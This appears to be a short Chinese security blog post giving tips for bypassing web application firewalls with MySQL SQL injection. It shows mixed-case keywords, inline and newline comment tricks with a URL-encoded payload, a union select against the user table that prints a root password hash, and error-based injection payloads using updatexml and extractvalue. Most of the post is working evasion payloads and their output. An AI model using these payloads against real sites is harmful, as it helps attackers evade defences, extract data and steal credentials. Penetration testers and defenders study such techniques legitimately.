waf绕过:WAF绕过tips—-mysql |

  • A+
所属分类:Seay信息安全博客

显示不全请点击全屏阅读

1、转换大小写

1
2
3
4
5
6
7
mysql> SeLECt 1,2;
+---+---+
| 1 | 2 |
+---+---+
| 1 | 2 |
+---+---+
1 row in set (0.02 sec)

 

2、内联注释

1
2
3
4
5
6
7
mysql> /*!select*//**/1,2;
+---+---+
| 1 | 2 |
+---+---+
| 1 | 2 |
+---+---+
1 row in set (0.00 sec)

 

3、换行

1
2
3
4
5
6
7
8
9
10
11
12
mysql> select
-> #abc
-> 1,
-> 2
-> #abc
-> ;
+---+---+
| 1 | 2 |
+---+---+
| 1 | 2 |
+---+---+
1 row in set (0.06 sec)

url—->select%0a%23abc%0a1,%0a2#23abc

 

4、表后面加xxx

1
2
3
4
5
6
7
8
mysql> select user,password from user xxx union select(1),(2);
+------+-------------------------------------------+
| user | password |
+------+-------------------------------------------+
| root | *81F5E21E35407D884A6CD4A731AEBFB6AF209E1B |
| 1 | 2 |
+------+-------------------------------------------+
2 rows in set (0.08 sec)

 

5、冷门函数

1
2
3
and 1=(updatexml(1,concat(0x5c,(select user()),0x5c),1))
 
and extractvalue(1, concat(0x5c, (select user()),0x5c));

不过这两条语句要报错模式,msyql版本大于5.1

 

ps:后续更新。

 

by qingsh4n

Tags:

waf绕过,

如果您喜欢我的博客,欢迎点击图片定订阅到邮箱填写您的邮件地址,订阅我们的精彩内容: 也可以点击链接【订阅到鲜果】

如果我的想法或工具帮助到了你,也可微信扫下方二维码打赏本人一杯咖啡
waf绕过:WAF绕过tips—-mysql |